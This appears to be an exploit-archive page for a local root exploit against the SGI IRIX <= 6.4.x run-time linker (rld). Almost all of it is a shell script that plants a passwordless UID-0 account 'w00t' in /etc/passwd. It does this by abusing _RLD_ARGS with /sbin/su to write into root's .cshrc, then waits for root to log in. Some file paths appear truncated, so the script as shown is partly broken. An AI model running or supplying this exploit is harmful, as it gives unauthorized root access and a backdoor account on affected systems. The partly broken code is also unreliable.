SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

SGI IRIX versions 6.4.x and below run-time linker (rld) arbitrary file creation exploit.

MD5 | 22c4dd3bf38e8b2ac6db4f303c2664fb

# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit
# =======================================================================
# The IRIX run-time linker on all versions prior to 6.5 does not properly
# scrub environment variables when executing binaries with privilege or
# capabilities. A malicious user can leverage this to create files as the
# "root" user and partially control the contents.
# -- HackerFantastic (
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/
chmod 755 /tmp/
_RLD_ARGS="-log /.cshrc |/tmp/" /sbin/su
last -3 root
echo "[ waiting 5mins for root to login..."
sleep 300
su - w00t

Related Posts